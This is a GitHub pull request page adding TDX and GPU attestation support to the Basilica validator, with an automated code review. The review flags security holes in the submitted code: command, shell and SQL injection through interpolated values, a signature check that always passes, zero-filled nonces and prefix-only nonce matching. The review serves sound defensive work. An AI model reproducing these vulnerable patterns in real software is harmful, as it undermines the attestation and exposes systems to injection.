
Feat/tee #365

Open
distributedstatemachine wants to merge 9 commits into main from feat/tee

Conversation

@distributedstatemachine
Member

@distributedstatemachine distributedstatemachine commented Feb 12, 2026

Summary

Brief description of what this PR does.

Related Issues

Closes #(issue number)

Type of Change

  • Bug fix (non-breaking change that fixes an issue)
  • New feature (non-breaking change that adds functionality)
  • Breaking change (fix or feature that would cause existing functionality to not work as expected)
  • Documentation update
  • Performance improvement
  • Code refactoring

Changes Made

List the main changes in this PR:

Testing

How Has This Been Tested?

Describe the tests you ran to verify your changes.

  • Unit tests pass (cargo test)
  • Integration tests pass
  • Manual testing completed

Test Configuration

  • OS:
  • Rust version:
  • Bittensor version (if applicable):

Checklist

  • My code follows the project's style guidelines
  • I have run cargo fmt to format my code
  • I have run cargo clippy and addressed all warnings
  • I have added tests that prove my fix is effective or that my feature works
  • New and existing unit tests pass locally with my changes
  • I have commented my code, particularly in hard-to-understand areas
  • I have made corresponding changes to the documentation
  • My changes generate no new warnings
  • Any dependent changes have been merged and published

Additional Context

Add any other context about the PR here.

Summary by CodeRabbit

  • New Features

    • Added support for Trusted Execution Environment (TEE) verification including Intel TDX and NVIDIA GPU Confidential Computing attestation
    • Added new API endpoints for querying TEE status summary, node-specific TEE details, and checking TEE availability
    • Added configuration options to require and enforce TEE capabilities across nodes
    • Added remote attestation integration for TEE verification services
    • Added TEE verification status tracking in the database
  • Chores

    • Added basilica-tee crate and integrated it into the validator
    • Added TEE-related database migrations and persistence layer

@coderabbitai
Contributor

coderabbitai bot commented Feb 12, 2026

Walkthrough

Introduces comprehensive Trusted Execution Environment (TEE) support across the Basilica codebase through a new basilica-tee crate, validator integration for TDX quote and GPU CC attestation verification, database persistence, API endpoints for TEE status queries, and bootstrap workflows for remote TEE configuration.

Changes

  • Build & Workspace Configuration (.cargo/config.toml, .github/workflows/ci.yml, Cargo.toml, crates/basilica-tee/Cargo.toml): Updated Cargo configuration with a PyO3 Python path; added basilica-tee to the CI pipeline with a new build-tee job, change detection, and workflow integration; extended workspace members to include the basilica-tee crate.
  • Example & Validator Configuration (config/validator.toml.example, crates/basilica-validator/src/config/main_config.rs): Added a TEE verification configuration block with TDX, GPU CC, MRTD/RTMR expectations, GPU model allowlisting, and remote attestation settings; extended VerificationConfig with TeeValidationConfig.
  • New basilica-tee Crate - Core Library (crates/basilica-tee/src/lib.rs, crates/basilica-tee/README.md, crates/basilica-tee/src/error.rs, crates/basilica-tee/src/config.rs, crates/basilica-tee/src/types/*, crates/basilica-tee/src/traits.rs): Established the public API surface, error handling, configuration structures, and trait definitions for TEE operations; introduced the GpuDeviceInfo, GpuAttestationEvidence, ExpectedMeasurements, and TeeVerificationResult types.
  • TDX Support - basilica-tee (crates/basilica-tee/src/tdx/*): Implements TDX quote parsing (TdxQuoteV4, QuoteHeader, TdReport), quote generation (TdxQuoteProvider via CLI invocation), and local and remote verification (TdxQuoteVerifier, RemoteTdxVerifier with DCAP support).
  • GPU CC Support - basilica-tee (crates/basilica-tee/src/gpu/*): Provides GPU device detection (GpuDeviceProvider with NVML support), evidence generation (NvEvidenceProvider), parsing (JsonEvidenceParser), local and remote verification (LocalGpuVerifier, RemoteGpuVerifier with NRAS support), and utility functions.
  • Bootstrapping & Setup - basilica-tee (crates/basilica-tee/src/bootstrap/*): Defines shell command templates for TDX/GPU detection, installation, and configuration; includes TDX host/guest VM orchestration, PCCS setup, and comprehensive end-to-end bootstrap workflows; provides parsing utilities for command output interpretation.
  • Attestation Service - basilica-tee (crates/basilica-tee/src/service.rs, crates/basilica-tee/src/crypto/*, crates/basilica-tee/src/server/*): Implements the TeeService orchestrator combining TDX and GPU attestation; adds OpenSSL-based certificate hashing; provides an HTTP attestation server with Axum routes for health, attestation generation, and device queries.
  • Validator Integration - Miner Prover (crates/basilica-validator/src/miner_prover/validation_tee.rs, validation_tdx_host.rs, validation_strategy.rs, types.rs): Introduces the TeeValidator orchestrator for remote verification and TdxHostValidator for SSH-based TDX host readiness checks and setup; integrates TEE verification into the validation strategy with metrics and persistence.
  • Validator API Routes (crates/basilica-api/src/api/routes/tee.rs, crates/basilica-validator/src/api/routes/tee.rs, crates/basilica-validator/src/api/routes/rentals.rs, crates/basilica-validator/src/api/mod.rs): Adds TEE status endpoints (summary, per-node status, verified nodes list); implements TEE requirement checking for rental startups; extends the rental request with TeeRequirements; wires the new routes into the API router.
  • Validator API Client & Storage (crates/basilica-validator/src/api/client.rs, crates/basilica-validator/src/persistence/tee_profile.rs, crates/basilica-validator/migrations/004_add_tee_status.sql): Adds ValidatorClient methods for TEE endpoints; implements the persistence layer (store, query, summarize TEE status); creates the node_tee_status table with verification fields, indexes, and verification_logs augmentation.
  • Validator Dependencies & Tooling (crates/basilica-validator/Cargo.toml, justfile): Added the basilica-tee dependency with the remote-attestation feature and getrandom; introduced comprehensive Justfile targets for TDX host/guest testing workflows with SSH parameter support.
  • Metrics & Observability (crates/basilica-validator/src/metrics/prometheus_metrics.rs, crates/basilica-validator/src/miner_prover/scheduler.rs): Adds TEE metrics (verification counters, gauges, histograms, durations) and collection methods; includes per-node recording for TDX quote generation and GPU CC attestation.
  • Testing & Examples (crates/basilica-tee/tests/integration_test.rs, crates/basilica-validator/tests/tee_integration_test.rs, crates/basilica-validator/tests/tdx_host_integration_test.rs): Comprehensive integration tests for TEE quote parsing, GPU evidence, config handling, and TDX host/VM workflows; extensive live-environment tests with SSH and environment-driven configuration.
  • Minor Updates (crates/basilica-validator/src/miner_prover/mod.rs, crates/basilica-validator/src/persistence/mod.rs, crates/basilica-validator/src/cli/handlers/rental.rs, various test files): Module declarations, field additions (tee_requirements, tee_verification), and test configuration updates to support TEE integration throughout the validator.

Sequence Diagram(s)

sequenceDiagram
    participant Client
    participant Validator API
    participant TEE Service
    participant Database
    participant Remote Executor (SSH)

    Client->>Validator API: POST /tee/attest (node_id, nonce)
    Validator API->>TEE Service: attest(nonce)
    
    TEE Service->>Remote Executor: SSH: Generate TDX quote
    Remote Executor-->>TEE Service: TDX quote bytes
    TEE Service->>Remote Executor: SSH: Generate GPU evidence
    Remote Executor-->>TEE Service: GPU attestation evidence JSON
    
    TEE Service->>TEE Service: Verify TDX quote (check MRTD/RTMRs)
    TEE Service->>TEE Service: Verify GPU evidence (parse & check nonce)
    
    TEE Service-->>Validator API: TeeVerificationResult
    Validator API->>Database: store_node_tee_status(verification)
    Database-->>Validator API: OK
    
    Validator API-->>Client: AttestationResponse (quote, evidence, status)
sequenceDiagram
    participant CLI/Job
    participant TDX Host Validator
    participant Remote Host (SSH)
    participant Persistence

    CLI/Job->>TDX Host Validator: setup_tdx_host_full()
    
    TDX Host Validator->>Remote Host: SSH: Check TDX status
    Remote Host-->>TDX Host Validator: Status (BIOS, kernel, QGS, etc.)
    TDX Host Validator->>TDX Host Validator: Parse status output
    
    TDX Host Validator->>Remote Host: SSH: Install TDX packages
    Remote Host-->>TDX Host Validator: Installation result
    
    TDX Host Validator->>Remote Host: SSH: Configure GRUB
    Remote Host-->>TDX Host Validator: Config result
    
    alt Reboot Required
        TDX Host Validator->>Remote Host: SSH: Reboot
        TDX Host Validator->>Remote Host: SSH: Wait for boot (poll boot_id)
        Remote Host-->>TDX Host Validator: System online
    end
    
    TDX Host Validator->>Remote Host: SSH: Verify TDX setup
    Remote Host-->>TDX Host Validator: Verification result
    
    TDX Host Validator->>Persistence: Store host setup status
    Persistence-->>TDX Host Validator: OK
    
    TDX Host Validator-->>CLI/Job: TdxHostStatus

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

Possibly related PRs

Suggested reviewers

  • itzlambda
  • epappas

Poem

🐰 Hops excitedly with bunny ears

TEE upon the horizon bright,
Quotes and proofs in cryptic flight,
GPU secrets verified true,
TDX magic, fresh and new! ✨

🚥 Pre-merge checks | ✅ 2 passed | ❓ 1 inconclusive

❓ Inconclusive (1)
  • Title check: The title 'Feat/tee' uses a non-descriptive term and lacks specificity about what the feature entails. Consider a more descriptive title that clearly conveys the feature's purpose, e.g., 'Add TEE (Trusted Execution Environment) support with TDX and GPU CC verification'.

✅ Passed (2)
  • Description check: Skipped because CodeRabbit's high-level summary is enabled.
  • Docstring coverage: 100.00%, which meets the required 80.00% threshold.


@coderabbitai coderabbitai bot left a comment
Actionable comments posted: 14

Note

Due to the large number of review comments, Critical severity comments were prioritized as inline comments.

🤖 Fix all issues with AI agents
In `@crates/basilica-tee/src/gpu/nvtrust.rs`:
- Around lines 77-105: get_evidence_python_sdk interpolates the nonce directly into a Python script, which allows command injection. Validate and sanitize the nonce before it reaches the format! call: ensure the string contains only hex characters (0-9, a-f, A-F) and has the expected length, returning TeeError::GpuAttestation on invalid input, and only then build the script passed to Command::new("python3"). Alternatively, avoid interpolation entirely by passing the nonce to the Python process via stdin or as an argument; if the script string is kept, strict hex validation of the nonce must come first.

In `@crates/basilica-tee/src/service.rs`:
- Around lines 206-208: The fallback nonce = expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes()) uses the UTF-8 bytes of the hex string instead of the decoded nonce bytes. Decode attestation.nonce_hex from hex (e.g., via hex::decode) and use the resulting bytes as the fallback, returning a verification failure on decode errors rather than silently using the UTF-8 bytes. Update the assignment that produces nonce and any downstream expectations to use the decoded bytes.
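For illustration, a std-only stand-in for hex::decode that shows the intended behavior, failing loudly on malformed input instead of falling back to UTF-8 bytes (decode_hex is our name; the real code would use the hex crate):

```rust
/// Std-only stand-in for hex::decode: "deadbeef" -> [0xde, 0xad, 0xbe, 0xef],
/// erroring on odd length or non-hex characters rather than using UTF-8 bytes.
fn decode_hex(s: &str) -> Result<Vec<u8>, String> {
    if !s.is_ascii() || s.len() % 2 != 0 {
        return Err("invalid hex string".to_string());
    }
    (0..s.len())
        .step_by(2)
        .map(|i| u8::from_str_radix(&s[i..i + 2], 16).map_err(|e| e.to_string()))
        .collect()
}

fn main() {
    // The decoded nonce is 4 bytes, not the 8 UTF-8 bytes of the string itself.
    assert_eq!(decode_hex("deadbeef").unwrap(), vec![0xde, 0xad, 0xbe, 0xef]);
    assert!(decode_hex("zz").is_err());
}
```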

In `@crates/basilica-tee/src/tdx/provider.rs`:
- Around lines 183-188: TdxQuoteProvider::generate_quote hex-encodes the full 64-byte report_data and hands it to get_quote, which treats it as a nonce and truncates it once the cert hash and padding are applied. generate_quote must not re-interpret raw report_data as a nonce: either add an internal helper that sends the hex-encoded report_data directly to the CLI without the nonce + cert_hash logic, or give get_quote a flag or alternate path that accepts pre-formed report_data and bypasses the nonce + cert_hash/padding routine. Update generate_quote (references: generate_quote, get_quote, QuoteProvider, TdxQuoteProvider) to use that direct path, and ensure the length handling matches the CLI's expected input for full report blobs.
- Around lines 93-116: In get_quote, the Some(cert_hash) branch builds report_data by concatenating nonce + hash and truncating, but it never pads when the combined length is under 128, producing too-short report data. After concatenation, call data.truncate(128) and then push '0' while data.len() < 128 (the same padding logic as the else branch) so the final report_data is exactly 128 hex chars (64 bytes).
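The padding fix can be sketched as a pure function (build_report_data is our name; the real code builds the string inline in get_quote):

```rust
/// Concatenate nonce + cert hash, then force the result to exactly 128 hex
/// chars (64 bytes of report_data): truncate if too long, zero-pad if too short.
fn build_report_data(nonce_hex: &str, cert_hash_hex: &str) -> String {
    let mut data = format!("{}{}", nonce_hex, cert_hash_hex);
    data.truncate(128);
    while data.len() < 128 {
        data.push('0');
    }
    data
}

fn main() {
    // Short inputs are padded, long inputs truncated; output is always 128 chars.
    assert_eq!(build_report_data("aa", "bb").len(), 128);
    assert_eq!(build_report_data(&"a".repeat(100), &"b".repeat(100)).len(), 128);
}
```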

In `@crates/basilica-tee/src/tdx/quote.rs`:
- Around lines 26-39: QuoteHeader is missing the second 2-byte reserved field, which shifts qe_vendor_id and user_data by 2 bytes and causes to_bytes() to emit only 46 bytes. Add a second reserved field (e.g., reserved2: [u8; 2]) so the layout matches the 48-byte TDX header, update the parsing/serialization logic in to_bytes() and the constructor/deserializer to read and write all 48 bytes (including reserved2) so qe_vendor_id (16 bytes) and user_data (20 bytes) land at the correct offsets, and ensure to_bytes() writes the full 48 bytes with no trailing zeros. Also fix verify_nonce() to perform a full 32-byte equality check against the expected nonce, not a prefix compare, so the entire nonce field is validated.
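The strict nonce check can be sketched like this (the free-function signature is our simplification; the real method compares against the quote's report_data):

```rust
/// Require a full 32-byte expected nonce and compare every byte, so a short
/// "nonce" can no longer match on a prefix of report_data.
fn verify_nonce(report_nonce: &[u8; 32], expected: &[u8]) -> bool {
    expected.len() == 32 && report_nonce[..] == *expected
}

fn main() {
    let nonce = [0x11u8; 32];
    assert!(verify_nonce(&nonce, &[0x11u8; 32]));
    // A 1-byte value no longer passes just because the first byte agrees.
    assert!(!verify_nonce(&nonce, &[0x11u8]));
}
```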

In `@crates/basilica-tee/src/tdx/remote_verification.rs`:
- Around lines 42-51: DcapVerificationRequest defines the field is_v_enclave_quote_status, which serializes incorrectly. Rename it to isv_enclave_quote: String so that serde(rename_all = "camelCase") produces the expected "isvEnclaveQuote" key, and update every construction site of DcapVerificationRequest (including the one referenced at line 114) to set the new field. Keep nonce: Option<String> as-is.

In `@crates/basilica-tee/src/tdx/verification.rs`:
- Around lines 119-130: verify_signature unconditionally returns Ok(true), which lets any TdxQuoteV4 be treated as valid. Make it fail safe by returning Ok(false) by default, and gate the stubbed "always-true" behavior behind a crate feature or config flag intended only for testing. Emit a clear warning log when permissive mode is enabled so callers (and TEE status consumers such as TeeVerificationStatus::from_tee_result) know this is not real verification.
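A fail-closed sketch of that shape (the permissive flag stands in for the crate feature or config check; the error type is simplified):

```rust
/// Fail closed: return Ok(false) unless a test-only permissive flag is set,
/// and log loudly when the stubbed always-true path is taken.
fn verify_signature(_quote: &[u8], permissive: bool) -> Result<bool, String> {
    if permissive {
        eprintln!("WARNING: TDX signature verification is stubbed out (permissive mode)");
        return Ok(true);
    }
    // Real DCAP signature verification would go here; until then, reject.
    Ok(false)
}

fn main() {
    assert_eq!(verify_signature(b"quote", false), Ok(false));
    assert_eq!(verify_signature(b"quote", true), Ok(true));
}
```

Failing closed means an unfinished verifier surfaces as a verification failure rather than a silent pass, which matches how the rest of the TEE pipeline treats invalid evidence.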

In `@crates/basilica-validator/src/api/mod.rs`:
- Around lines 166-174: The router registers POST /tee/availability twice, which will panic. Locate the two .route("/tee/availability", post(...)) entries in the router setup, delete the one referencing routes::check_tee_availability, and keep routes::tee::check_tee_availability as the sole POST handler. Verify no other duplicate registrations for the same path and method remain.

In `@crates/basilica-validator/src/api/routes/tee.rs`:
- Around lines 107-143: get_node_tee_status calls state.persistence.get_node_tee_status_by_node_id(&node_id), which filters only by node_id even though the table's primary key is (miner_uid, node_id), so it can return an arbitrary row. Either (A) change the route to also accept miner_uid (e.g., Path<(String, String)> or a separate path/query param), add a persistence method such as get_node_tee_status_by_miner_and_node(miner_uid, node_id), and return a single NodeTeeStatusResponse; or (B) change the persistence call to return all matching rows (e.g., get_node_tee_statuses_by_node_id(node_id) -> Vec<Row>) and return a list of NodeTeeStatusResponse. Update the Row -> NodeTeeStatusResponse mapping accordingly, and adjust the API signature, route parsing, and persistence method names together while preserving the error/NotFound semantics.

In `@crates/basilica-validator/src/miner_prover/validation_tdx_host.rs`:
- Around lines 274-278: The command assembly in validation_tdx_host.rs interpolates user-controlled values into single-quoted shell strings (intel_api_key into the local cmd built from tdx_host::CONFIGURE_PCCS, and vm_name in create_test_tdx_vm, cleanup_test_vm, and the bash -c wrappers used by test_guest_quote_generation/wait_for_vm), which allows shell injection. Either escape embedded single quotes (replace each ' with '\'' ) before building cmd, or, preferably, stop embedding values into single-quoted shell lines and pass them via the SSH transport's environment-variable support. Apply the chosen method consistently to the intel_api_key usage and all vm_name interpolations.
- Around lines 770-774: Using .replace('\n', "; ") on the tdx_guest script constants corrupts shell comments and heredocs. Change create_disk_cmd, and every other place applying this pattern to tdx_guest::CREATE_TDX_VM_DISK, CREATE_CLOUD_INIT, LAUNCH_TDX_VM_QEMU, WAIT_FOR_TDX_VM, TEST_GUEST_QUOTE_GEN, CLEANUP_TDX_VM, and FULL_TDX_GUEST_TEST, to pass the multi-line script to bash as a proper heredoc (or write it to a temporary file and execute that) so the exact constant contents run without newline replacement.
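The quote-escaping option from the first comment above can be sketched as (shell_single_quote is our helper name, not the PR's):

```rust
/// Wrap a value in single quotes for the shell, escaping any embedded single
/// quote as '\'' so the value cannot break out of the quoted region.
fn shell_single_quote(value: &str) -> String {
    format!("'{}'", value.replace('\'', r#"'\''"#))
}

fn main() {
    assert_eq!(shell_single_quote("vm-01"), "'vm-01'");
    // An injection attempt stays inert inside the quoting.
    assert_eq!(
        shell_single_quote("a'; rm -rf /;'"),
        r#"'a'\''; rm -rf /;'\'''"#
    );
}
```

Passing values through the SSH transport's environment support is still preferable, since escaping must then be audited at every interpolation site.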

In `@crates/basilica-validator/src/miner_prover/validation_tee.rs`:
- Around lines 938-942: The getrandom calls populating tdx_nonce and gpu_nonce use unwrap_or_default(), which silently produces all-zero nonces on failure. Treat failure as a hard error: check the Result of both getrandom calls and propagate an Err (or panic with expect) instead of filling with zeros, so any getrandom::getrandom error fails fast with a clear message.
- Around lines 744-751: The code in validation_tee.rs tries to read quote_output as a filesystem path via tokio::fs::read(quote_output), but quote_output is the SSH stdout containing the quote data itself, so that branch always fails. Remove the tokio::fs::read path and decode the data directly (e.g., let quote_bytes = hex::decode(quote_output).context("Failed to decode TDX quote")?), or otherwise treat quote_output as the raw bytes received over SSH, updating the error context accordingly.

In `@crates/basilica-validator/src/persistence/tee_profile.rs`:
- Around lines 238-260: count_nodes_matching_tee_requirements builds SQL by interpolating expected_mrtd_hex directly into the query string, enabling SQL injection. When expected_mrtd_hex is Some(...), append a parameter placeholder (e.g., " AND tdx_mrtd_hex = ?") and pass the value via sqlx binding instead of format! interpolation; use sqlx::query (or query_scalar) with .bind(mrtd) before fetch_one/fetch_optional so the tdx_mrtd_hex filter is applied safely without string concatenation.
🟠 Major comments (23)
.cargo/config.toml-3-5 (1)

3-5: ⚠️ Potential issue | 🟠 Major

Hardcoded macOS-only Python path will break on Linux/CI and other platforms.

/opt/homebrew/bin/python3 exists only on Apple Silicon Macs. This .cargo/config.toml is committed to the repo and applies to all developers and CI runners (which run Ubuntu). On systems without this path, PyO3 build discovery may fail or require an override.

Consider removing this from the shared config and letting developers set it locally (e.g., via an untracked .cargo/config-local.toml or environment variable), or use a more portable default like python3.

Suggested fix
-[env]
-# Use system Python for PyO3 builds (supports Python 3.10+)
-PYO3_PYTHON = "/opt/homebrew/bin/python3"
+# [env]
+# Set PYO3_PYTHON locally if needed, e.g.:
+# PYO3_PYTHON = "python3"
crates/basilica-tee/src/gpu/utils.rs-40-46 (1)

40-46: ⚠️ Potential issue | 🟠 Major

normalize_gpu_id doesn't handle lowercase "gpu-" prefix, producing malformed IDs.

If the input is "gpu-abc123", starts_with(GPU_ID_PREFIX) is false (since GPU_ID_PREFIX is "GPU-"), so the result is "GPU-gpu-abc123" — a double-prefixed, malformed ID.

Since sanitize_gpu_id already handles both cases, consider stripping first then re-prefixing:

Suggested fix
 pub fn normalize_gpu_id(gpu_id: &str) -> String {
-    if gpu_id.starts_with(GPU_ID_PREFIX) {
-        gpu_id.to_string()
-    } else {
-        format!("{}{}", GPU_ID_PREFIX, gpu_id)
-    }
+    let stripped = gpu_id
+        .strip_prefix("GPU-")
+        .or_else(|| gpu_id.strip_prefix("gpu-"))
+        .unwrap_or(gpu_id);
+    format!("{}{}", GPU_ID_PREFIX, stripped)
 }
crates/basilica-tee/src/types/measurements.rs-71-88 (1)

71-88: ⚠️ Potential issue | 🟠 Major

Add rust-version = "1.82" to basilica-tee's Cargo.toml or use an alternative to is_none_or.

Option::is_none_or requires Rust 1.82.0, but the workspace declares rust-version = "1.80" at the root level. The basilica-tee crate does not declare its own rust-version, creating an MSRV mismatch. This code will fail to compile on Rust 1.80. Either add rust-version = "1.82" to crates/basilica-tee/Cargo.toml or replace is_none_or with a compatible pattern such as self.mrtd.as_ref().map_or(true, |expected| expected == mrtd).

crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs-158-265 (1)

158-265: ⚠️ Potential issue | 🟠 Major

LAUNCH_TDX_VM_QEMU uses libvirt/pflash, contradicting module docs and mismatching CLEANUP_TDX_VM.

Two related issues:

  1. Doc contradiction: The module header (Lines 8-9) explicitly states "-bios /usr/share/ovmf/OVMF.fd (NOT pflash, which requires unsupported KVM readonly memory)". But LAUNCH_TDX_VM_QEMU generates a libvirt XML with <loader … type='pflash'> (Line 219) and <nvram> (Line 220), which is the pflash approach.

  2. Cleanup mismatch: CLEANUP_TDX_VM uses PID files and monitor sockets (QEMU direct-launch artifacts), but LAUNCH_TDX_VM_QEMU launches via virsh define/virsh start. The cleanup should use virsh destroy/virsh undefine instead.

Either align LAUNCH_TDX_VM_QEMU with the documented -bios approach (matching FULL_TDX_GUEST_TEST), or update the docs and cleanup script to match the libvirt path.

Also applies to: 407-440

crates/basilica-tee/src/tdx/quote.rs-193-199 (1)

193-199: ⚠️ Potential issue | 🟠 Major

verify_nonce uses prefix matching, which weakens attestation verification.

A 1-byte nonce would match any quote whose first report_data byte equals that byte. For security-critical attestation, the nonce should be compared in full (e.g., require exactly 32 bytes and compare all of them), or at minimum the trailing bytes should be checked to be zero.

Proposed fix — require exact-length or zero-padded full comparison
     pub fn verify_nonce(&self, expected_nonce: &[u8]) -> bool {
         if expected_nonce.len() > 32 {
             return false;
         }
-        self.nonce()[..expected_nonce.len()] == *expected_nonce
+        // Compare the nonce portion and verify remaining bytes are zero
+        self.nonce()[..expected_nonce.len()] == *expected_nonce
+            && self.nonce()[expected_nonce.len()..].iter().all(|&b| b == 0)
     }
crates/basilica-validator/src/api/routes/rentals.rs-652-687 (1)

652-687: ⚠️ Potential issue | 🟠 Major

check_tee_availability ignores allowed_gpu_models — inconsistent with start_rental.

The TeeRequirements struct includes allowed_gpu_models (Line 42), and start_rental validates it (Lines 314–330). However, check_tee_availability does not pass it to count_nodes_matching_tee_requirements, so a client could receive an "available" response for a node that will be rejected at rental time due to GPU model mismatch.

Consider either forwarding allowed_gpu_models to the persistence query or documenting that availability is an approximation.

crates/basilica-validator/src/api/routes/rentals.rs-299-311 (1)

299-311: ⚠️ Potential issue | 🟠 Major

MRTD hex comparison is case-sensitive — may cause false mismatches.

status.tdx_mrtd_hex and expected_mrtd_hex are compared with direct string equality (Line 301). If one side stores hex in lowercase (aa) and the other in uppercase (AA), the check will fail incorrectly. Normalize both sides before comparing.

🐛 Proposed fix
                 if let Some(ref expected_mrtd) = request.tee_requirements.expected_mrtd_hex {
-                    if status.tdx_mrtd_hex.as_ref() != Some(expected_mrtd) {
+                    let expected_lower = expected_mrtd.to_lowercase();
+                    let matches = status.tdx_mrtd_hex.as_ref()
+                        .is_some_and(|actual| actual.to_lowercase() == expected_lower);
+                    if !matches {
crates/basilica-validator/src/miner_prover/validation_strategy.rs-412-431 (1)

412-431: ⚠️ Potential issue | 🟠 Major

Silently swallowing from_hex errors may hide configuration mistakes.

ExpectedMeasurements::from_hex(...).unwrap_or_default() will produce empty/default measurements if the admin provides malformed hex for expected_mrtd, expected_rtmr0, etc. This means measurement matching would silently pass or be skipped, which is a security concern for TEE validation.

Consider logging a warning when from_hex fails:

Suggested fix
-                expected_measurements: super::validation_tee::ExpectedMeasurements::from_hex(
+                expected_measurements: match super::validation_tee::ExpectedMeasurements::from_hex(
                     config.tee.expected_mrtd.as_deref(),
                     config.tee.expected_rtmr0.as_deref(),
                     config.tee.expected_rtmr1.as_deref(),
                     config.tee.expected_rtmr2.as_deref(),
                     config.tee.expected_rtmr3.as_deref(),
-                )
-                .unwrap_or_default(),
+                ) {
+                    Ok(m) => m,
+                    Err(e) => {
+                        warn!("Invalid TEE expected measurements config, using defaults: {}", e);
+                        Default::default()
+                    }
+                },
crates/basilica-tee/src/tdx/verification.rs-80-90 (1)

80-90: ⚠️ Potential issue | 🟠 Major

Absent nonce silently passes report_data_matches — potential security gap.

When expected_nonce is None, report_data_matches defaults to true (Line 89). This means callers that omit the nonce don't get any report data validation, but the result still looks like it passed. Consider defaulting to false when no nonce is provided, or renaming the field to make the semantic clearer (e.g., report_data_checked: bool + report_data_matches: Option<bool>).

crates/basilica-tee/src/gpu/nvtrust.rs-67-74 (1)

67-74: ⚠️ Potential issue | 🟠 Major

Blocking std::process::Command called from async code path.

check_python_sdk_available uses synchronous std::process::Command, but it's called from get_evidence (Line 169) which is an async method. This blocks the tokio runtime thread. Use tokio::process::Command or wrap in tokio::task::spawn_blocking.

Proposed fix
-    fn check_python_sdk_available() -> bool {
-        std::process::Command::new("python3")
+    async fn check_python_sdk_available() -> bool {
+        tokio::process::Command::new("python3")
             .args(["-c", "import nv_attestation_sdk"])
             .output()
+            .await
             .map(|o| o.status.success())
             .unwrap_or(false)
     }

Then update the call site at Line 169:

-                if Self::check_python_sdk_available() {
+                if Self::check_python_sdk_available().await {
crates/basilica-validator/src/miner_prover/types.rs-124-157 (1)

124-157: ⚠️ Potential issue | 🟠 Major

tdx_verified does not account for report_data_matches, diverging from TdxVerificationResult::is_valid().

In crates/basilica-tee/src/types/verification.rs (Line 31-33), TdxVerificationResult::is_valid() checks quote_valid && mrtd_matches && report_data_matches. Here, tdx_verified only checks quote_valid && mrtd_matches (Line 130), ignoring report_data_matches. Similarly, gpu_cc_verified only uses attestation_valid while GpuCcVerificationResult::is_valid() also requires cc_mode_enabled && nonce_verified.

If this is intentional (e.g., a more relaxed validator-side view), consider documenting that reasoning. Otherwise, align the criteria:

Proposed fix
         .map(|tdx| {
                 (
-                    tdx.quote_valid && tdx.mrtd_matches,
+                    tdx.quote_valid && tdx.mrtd_matches && tdx.report_data_matches,
                     Some(tdx.mrtd_hex.clone()),
                 )
             })
         .map(|gpu| {
                 (
-                    gpu.attestation_valid,
+                    gpu.attestation_valid && gpu.cc_mode_enabled && gpu.nonce_verified,
                     gpu.cc_mode_enabled,
                     Some(gpu.gpu_model.clone()),
                 )
             })
crates/basilica-tee/src/tdx/verification.rs-92-112 (1)

92-112: ⚠️ Potential issue | 🟠 Major

Pass/fail log ignores RTMR match results.

The pass/fail determination on Line 102 checks quote_valid, mrtd_matches, and report_data_matches, but not rtmr_matches. A quote where all 4 RTMRs fail will still log "Quote verification passed." Either include result.rtmr_matches.iter().all(|&m| m) in the condition, or clarify in logs/docs that RTMRs are informational-only.

Proposed fix
-        if result.quote_valid && result.mrtd_matches && result.report_data_matches {
+        let all_rtmrs_match = result.rtmr_matches.iter().all(|&m| m);
+        if result.quote_valid && result.mrtd_matches && result.report_data_matches && all_rtmrs_match {
crates/basilica-tee/src/types/verification.rs-78-117 (1)

78-117: ⚠️ Potential issue | 🟠 Major

Inconsistent tee_verified criteria across constructors.

The conditions for tee_verified vary:

  • verified() (Line 81): tdx.quote_valid && tdx.mrtd_matches && gpu_cc.cc_mode_enabled — ignores gpu_cc.attestation_valid, tdx.report_data_matches
  • tdx_only() (Line 100): tdx.quote_valid && tdx.mrtd_matches — ignores report_data_matches
  • gpu_only() (Line 110): gpu_cc.cc_mode_enabled && gpu_cc.attestation_valid — more stringent than the GPU portion of verified()

This means a node with invalid GPU attestation can still be tee_verified = true via verified(), while the same GPU state would yield false via gpu_only(). Consider using is_valid() methods for consistency:

Proposed fix
     pub fn verified(tdx: TdxVerificationResult, gpu_cc: GpuCcVerificationResult) -> Self {
-        let tee_verified = tdx.quote_valid && tdx.mrtd_matches && gpu_cc.cc_mode_enabled;
+        let tee_verified = tdx.is_valid() && gpu_cc.is_valid();
         Self {
             tdx: Some(tdx),
             gpu_cc: Some(gpu_cc),
             tee_verified,
         }
     }
     pub fn tdx_only(tdx: TdxVerificationResult) -> Self {
-        let tee_verified = tdx.quote_valid && tdx.mrtd_matches;
+        let tee_verified = tdx.is_valid();
         Self {
     pub fn gpu_only(gpu_cc: GpuCcVerificationResult) -> Self {
-        let tee_verified = gpu_cc.cc_mode_enabled && gpu_cc.attestation_valid;
+        let tee_verified = gpu_cc.is_valid();
         Self {
crates/basilica-api/src/api/routes/tee.rs-149-160 (1)

149-160: ⚠️ Potential issue | 🟠 Major

allowed_gpu_models is accepted from the client but silently dropped.

TeeRequirements at Line 159 includes allowed_gpu_models: Option<Vec<String>>, but the conversion to the validator's TeeRequirements at Lines 183-187 doesn't include this field (the validator struct lacks it). A caller supplying allowed_gpu_models would believe it's being used for filtering when it's actually ignored.

Either remove the field from the API-side struct, or propagate it to the validator.

Also applies to: 176-207
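A minimal sketch of the propagation option, using simplified stand-in structs (`ApiTeeRequirements` / `ValidatorTeeRequirements` are illustrative names, not the actual types in the codebase):

```rust
// Hedged sketch: carry `allowed_gpu_models` through the conversion instead of
// dropping it. Both structs are simplified stand-ins for the real types.
#[derive(Debug, Clone)]
struct ApiTeeRequirements {
    require_tdx: bool,
    allowed_gpu_models: Option<Vec<String>>,
}

#[derive(Debug, Clone)]
struct ValidatorTeeRequirements {
    require_tdx: bool,
    // Field added so the client-supplied filter is honored rather than ignored.
    allowed_gpu_models: Option<Vec<String>>,
}

impl From<ApiTeeRequirements> for ValidatorTeeRequirements {
    fn from(api: ApiTeeRequirements) -> Self {
        Self {
            require_tdx: api.require_tdx,
            allowed_gpu_models: api.allowed_gpu_models,
        }
    }
}

fn main() {
    let api = ApiTeeRequirements {
        require_tdx: true,
        allowed_gpu_models: Some(vec!["H100".to_string()]),
    };
    let validator: ValidatorTeeRequirements = api.into();
    assert_eq!(validator.allowed_gpu_models, Some(vec!["H100".to_string()]));
}
```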

crates/basilica-validator/src/persistence/tee_profile.rs-161-182 (1)

161-182: ⚠️ Potential issue | 🟠 Major

SUM(...) returns NULL on an empty table — row.get::<i64, _>() will panic.

